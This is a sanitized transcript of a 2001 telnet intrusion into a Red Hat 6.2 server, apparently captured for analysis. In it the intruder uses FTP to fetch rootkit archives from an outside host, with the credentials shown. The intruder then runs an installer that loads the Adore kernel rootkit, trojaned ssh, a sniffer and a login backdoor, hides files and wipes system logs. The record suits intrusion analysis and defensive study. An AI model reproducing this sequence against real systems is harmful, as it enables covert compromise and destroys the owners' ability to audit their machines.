Sanitized version of the transcript of the TELNET session took place 20:32:10 on Sept-16-2001

Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0 on an i586
login: nobody
Last login: Sun Sep 16 04:32:21 from 217.156.93.166
sh: ulimit: cannot modify limit: Operation not permitted
sh-2.03$ su dns
nobody@ns1: /[root@ns1 /]# w
4:49am up 3 days, 10:57, 1 user, load average: 0.00, 0.00, 0.04
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
nobody pts/0 217.156.93.166 4:49am 0.00s 1.02s ? -
nobody@ns1: /[root@ns1 /]# cd /tmp
nobody@ns1: /tmp[root@ns1 /tmp]# mc -s
bash: mc: command not found
nobody@ns1: /tmp[root@ns1 /tmp]# cd /dev/rd
nobody@ns1: /dev/rd[root@ns1 rd]# ftp teleport.go.ro

nobody@ns1: /dev/rd[root@ns1 rd]#
nobody@ns1: /dev/rd[root@ns1 rd]#
nobody@ns1: /dev/rd[root@ns1 rd]# mkdir sdc0
nobody@ns1: /dev/rd[root@ns1 rd]# cd sdc0
nobody@ns1: /dev/rd[root@ns1 rd]# ls
nobody@ns1: /dev/rd[root@ns1 rd]#
nobody@ns1: /dev/rd[root@ns1 rd]# ftp teleport.go.ro

connected to teleport.go.ro
220-
220-
220- H O M E . R O
220-
220- This server is for HOME.RO members only.
220- Go to http://www.home.ro/ to register .
220-
220- No anonymous access allowed.
220-
220-
220 ProFTPD 1.2.2rc3 Server (HOME.RO Members FTP) [193.231.236.42]
Name (teleport.go.ro:nobody): teleport
331 Password required for teleport.
331 Password: gunoierul
230 User teleport logged in.
Remote System Type is UNIX.
using binary mode to transfer files.
ftp> cd new
250 CWD command successful.
ftp> get Zer0.tar.gz
local: Zer0.tar.gz remote: Zer0.tar.gz
200 PORT command successful.
150 Opening BINARY mode data connection for Zer0.tar.gz (139711 bytes).
226 Transfer completed.
139711 bytes received in 7.76 secs (18 Kbytes/sec)
ftp> get copy.tar.gz
local: copy.tar.gz remote: copy.tar.gz
200 PORT command successful
150 Opening BINARY mode data connection for copy.tar.gz (265189 bytes).
226 Transfer completed.
265189 bytes received in 14.6 secs (18 Kbytes/sec)
ftp> get ooty.tar.gz
local: ooty.tar.gz remote: ooty.tar.gz
200 PORT command successful
150 Opening BINARY mode data connection for ooty.tar.gz (14847 bytes)
226 Transfer completed
14847 bytes received in 0.856 secs (17 Kbytes/sec)
ftp> bye
221 Goodbye.
?]0;nobody@ns1: /dev/rd/sdc0?[root@ns1 rd]# tar zxvf Zer0.tar.gz
Zer0/
tar: Archive contains future timestamp 2001-09-16 20:26:34
Zer0/Go
Zer0/ssh.tgz
Zer0/tls.tgz
Zer0/adr.tgz
Zer0/adr2.tgz
tar: Archive contains future timestamp 2001-09-16 20:27:45
Zero/adore.h
nobody@ns1: /dev/rd/sdc0[root@ns1 rd]# cd Zer0/
nobody@ns1: /dev/rd/sdc0/Zer0[root@ns1 rd]# ls
Go adore.h adr.tgz adr2.tgz ssh.tgz tls.tgz
nobody@ns1: /dev/rd/sdc0/Zer0[root@ns1 rd]# ./Go 24
syslogd: no process killed
====================================================================

.oooo. oooo o8o .
.o8 d8P''Y8b '888 ''' .o8
.o888oo 888 888 oooo d8b ooo. .oo. 888 oooo oooo .o888oo
888 888 888 '888''8P '888P'Y88b 888 .8P' '888 888
888 888 888 888 888 888 888888. 888 888
888 . '88b d88' 888 888 888 888 '88b. 888 888 .
'888' 'Y8bd8P' d888b o888o o888o o888o o888o o888o '888'

Modificat de mine... Viruzzel
====================================================================
backdooring started on ns1
# #
# #
checking for remote logging...
holy guacamole batman

${RED} REMOTE LOGGING DETECTED ${RES}
${WHI} I hope you can get to these other computer(s): ${RES}

000.000.00.000

${WHI} cuz this computer is LOGGING to it... ${RES}

--------------------------------------------------------------------
# [Droping files...]
--------------------------------------------------------------------

nobody@ns1: /dev/rd/sdc0/Zer0[root@ns1 rd]#
[root@ns1 Zer0]#
exit
.t0rn/
.t0rn/shhk
.t0rn/shrs
.t0rn/shhk.pub
.t0rn/shsml
.t0rn/sharsed
.t0rn/shdcf2
.t0rn/shhash
EOT
CVS/
CVS/Root
CVS/Repository
CVS/Entries
CVS/Tag
Makefile.gen
tar: Archive contains future timestamp 2029-09-09 09:05:12
adore.c
adore.h
ava.c
cleaner.c
cnfad
dummy.c
libinvisible.c
libinvisible.h
pass
rename.c
stad
lgstrip
nscd.init
patch
vrssb
vrssnf
vrssnk
--------------------------------------------------------------------
# [Installing trojans...]
--------------------------------------------------------------------
# Using ssh-port : 24

--------------------------------------------------------------------
[System Information...]
--------------------------------------------------------------------
Hostname : ns1 (192.168.1.102)
Arch : i586 -+- bogomips : 187.19 '
Alternative IP : 127.0.0.1 -+- Might be [ 1 ] active adapters.
Distribution: Red Hat Linux release 6.2 (Zoot)

--------------------------------------------------------------------
ipchains ...?
--------------------------------------------------------------------
Chain input (policy ACCEPT):
--------------------------------------------------------------------
# [Searching for Make, gcc...]
--------------------------------------------------------------------
Make found!
gcc found!
--------------------------------------------------------------------
# [Installing adore...]
--------------------------------------------------------------------

Starting adore configuration ...

Checking 4 ELITE_UID ... found 30
Checking 4 ELITE_CMD ...
using 107613
Checking 4 SMP ... NO
Checking 4 MODVERSIONS ... YES
Checking for kgcc ... found cc
Checking 4 insmod ... found /sbin/insmod -- OK

Loaded modules:
lockd 31592 1 (autoclean)
sunrpc 53540 1 (autoclean) [lockd]
pcnet32 10692 1 (autoclean)

Since version 0.33 Adore requires 'authentication' for
its services. You will be prompted for a password now and this
password will be compiled into 'adore' and 'ava' so no further actions
by you are required.
This procedure will save adore from scanners.
Try to choose a unique name that won't clash with normal calls to mkdir(2).
Password (echoed): labutza

Preparing /usr/X11R6/bin/.,/copy/adr (== cwd) for hiding ...

Creating Makefile ...

*** Edit adore.h for the hidden services and redirected file-access ***
cp: Makefile: No such file or directory
make: *** Warning: File `adore.c' has modification time in the future (2029-09-09 09:05:12 > 2001-09-16 05:02:21)
rm -f adore.o
cc -c -I/usr/src/linux/include -O2 -Wall -DELITE_CMD=107613 -DELITE_UID=30 -DCURRENT_ADORE=39 -DADORE_KEY=\"labutza\" -DMODVERSIONS adore.c -o adore.o
adore.c
:484: warning: `/*' within comment
cc -O2 -Wall -DELITE_CMD=107613 -DELITE_UID=30 -DCURRENT_ADORE=39 -DADORE_KEY=\"labutza\" -DMODVERSIONS ava.c libinvisible.c -o ava
cc -I/usr/src/linux/include -c -O2 -Wall -DELITE_CMD=107613 -DELITE_UID=30 -DCURRENT_ADORE=39 -DADORE_KEY=\"labutza\" -DMODVERSIONS cleaner.c
make:
*** Warning: Clock skew detected. Your build may be incomplete.
ava found... proceeding!
sniffer running!
Checking for adore 0.12 or higher ...
Adore 0.39 installed. Good luck.
File '/usr/X11R6/bin/.,' hided.
Checking for adore 0.12 or higher ...
Adore 0.39 installed. Good luck.
File '/usr/info/.t0rn' hided.
Checking for adore 0.12 or higher ...
Adore 0.39 installed. Good luck.
File '/dev/rd/sdc0' hided.
Checking for adore 0.12 or higher ...
Adore 0.39 installed. Good luck.
File '/dev/rd/nscd.init' hided.
Checking for adore 0.12 or higher ...
Adore 0.39 installed. Good luck.
File '/etc/rc.d/rc3.d/S50inet' hided.
Checking for adore 0.12 or higher ...
Adore 0.39 installed. Good luck.
File '/usr/X11R6/lib/X11/.~' hided.
done hiding...

--------------------------------------------------------------------
# [hmmm...nothing to worry about, for you, hehehe...]
--------------------------------------------------------------------
USE this file for testing purposes ONLY ... tested on RH6.2
Login backdooring started ...
Step 1: Setting login parameters ... [ OK ]
Step 2: Setting su parameters ... [ OK ]
Step 3: Creating config files ... [ OK ]

Done??!!?hmmm.. who knows... :P I DO! hihihi
--------------------------------------------------------------------
# [Removing unnecessary files.. cleaning...]
--------------------------------------------------------------------
* sauber by socked [13.03.2k+1]
*
* Cleaning logs.. This may take a bit depending on the size of the logs.
* Cleaning boot.log (0 lines)...
0 lines removed!
* Cleaning boot.log.1 (133 lines)...
0 lines removed!
* Cleaning cron (8 lines)...
0 lines removed!
* Cleaning cron.1 (599 lines)...
0 lines removed!
* Cleaning dmesg (70 lines)...0 lines removed!
* Cleaning htmlaccess.log (0 lines)...
0 lines removed!
* Cleaning maillog (0 lines)...
0 lines removed!
* Cleaning maillog.1 (24 lines)...
0 lines removed!
* Cleaning messages (0 lines)...
0 lines removed!
* Cleaning messages.1 (383 lines)...
6 lines removed!
* Cleaning netconf.log (0 lines)...
0 lines removed!
* Cleaning secure (0 lines)...
0 lines removed!
* Cleaning secure.1 (52 lines)...
10 lines removed!
* Cleaning sendmail.st (0 lines)...
-1 lines removed!
* Cleaning spooler (0 lines)...
0 lines removed!
* Cleaning spooler.1 (0 lines)...
0 lines removed!
* Cleaning xferlog (0 lines)...
0 lines removed!
* Cleaning xferlog.1 (0 lines)...
0 lines removed!
syslogd: no process killed
* Alles sauber mein Meister !'Q%&@
* sauber by socked [13.03.2k+1]
*
* Cleaning logs.. This may take a bit depending on the size of the logs.
* Cleaning boot.log (0 lines)...
0 lines removed!
* Cleaning boot.log.1 (133 lines)...
0 lines removed!
* Cleaning cron (8 lines)...
0 lines removed!
* Cleaning cron.1 (599 lines)...
0 lines removed!
* Cleaning dmesg (70 lines)...
0 lines removed!
* Cleaning htmlaccess.log (0 lines)...
0 lines removed!
* Cleaning maillog (0 lines)...
0 lines removed!
* Cleaning maillog.1 (24 lines)...
0 lines removed!
* Cleaning messages (0 lines)...
0 lines removed!
* Cleaning messages.1 (377 lines)...
1 lines removed!
* Cleaning netconf.log (0 lines)...0 lines removed!
* Cleaning secure (0 lines)...
0 lines removed!
* Cleaning secure.1 (42 lines)...
26 lines removed!
* Cleaning sendmail.st (1 lines)...
0 lines removed!
* Cleaning spooler (0 lines)...0 lines removed!
* Cleaning spooler.1 (0 lines)...
0 lines removed!
* Cleaning xferlog (0 lines)...
0 lines removed!
* Cleaning xferlog.1 (0 lines)...0 lines removed!
syslogd: no process killed
* Alles sauber mein Meister !'Q%&@
* sauber by socked [13.03.2k+1]
*
* Cleaning logs.. This may take a bit depending on the size of the logs.
* Cleaning boot.log (0 lines)...
0 lines removed!
* Cleaning boot.log.1 (133 lines)...
0 lines removed!
* Cleaning cron (8 lines)...0 lines removed!
* Cleaning cron.1 (599 lines)...
0 lines removed!
* Cleaning dmesg (70 lines)...
0 lines removed!
* Cleaning htmlaccess.log (0 lines)...
0 lines removed!
* Cleaning maillog (0 lines)...
0 lines removed!
* Cleaning maillog.1 (24 lines)...
0 lines removed!
* Cleaning messages (0 lines)...
0 lines removed!
* Cleaning messages.1 (376 lines)...
0 lines removed!
* Cleaning netconf.log (0 lines)...
0 lines removed!
* Cleaning secure (0 lines)...
0 lines removed!
* Cleaning secure.1 (16 lines)...
0 lines removed!
* Cleaning sendmail.st (1 lines)...
0 lines removed!
* Cleaning spooler (0 lines)...
0 lines removed!
* Cleaning spooler.1 (0 lines)...
0 lines removed!
* Cleaning xferlog (0 lines)...
0 lines removed!
* Cleaning xferlog.1 (0 lines)...
0 lines removed!
syslogd: no process killed
* Alles sauber mein Meister !'Q%&@
--------------------------------------------------------------------
# [Linking /bin/.bash_history, adjusting time...]
--------------------------------------------------------------------
====================================================================
HIHIHI.. CICA GATA.. AM TERMINAT!! Zer0... by Viruzzel
====================================================================
nobody@ns1: /dev/rd/sdc0/Zer0\a[root@ns1 Zer0]#
exit
sh-2.03$